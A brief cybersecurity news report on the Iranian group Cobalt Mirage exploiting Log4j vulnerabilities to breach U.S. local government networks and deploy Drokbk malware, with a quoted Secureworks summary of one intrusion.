Iranian advanced persistent threat group Cobalt Mirage, also known as UNC2448 or Nemesis Kitten, has exploited the Log4j vulnerability to compromise numerous U.S. local government networks with the Drokbk malware since February, according to The Record, a news site by cybersecurity firm Recorded Future.
Cobalt Mirage is believed by Secureworks researchers to be behind a separate attack reported by the Cybersecurity and Infrastructure Security Agency that involved the compromise of a federal agency's server through Log4j vulnerability exploitation.
Drokbk malware, which was found to be deployed following network infiltration, was also revealed to leverage GitHub for securing its command-and-control infrastructure.
"The February intrusion that Secureworks incident responders investigated began with a compromise of a VMware Horizon server using two Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45046). Forensic artifacts indicated Drokbk.exe was extracted from a compressed archive (Drokbk.zip) hosted on the legitimate transfer . sh online service. The threat actors extracted the file to C:UsersDomainAdminDesktop and then executed it," said Secureworks.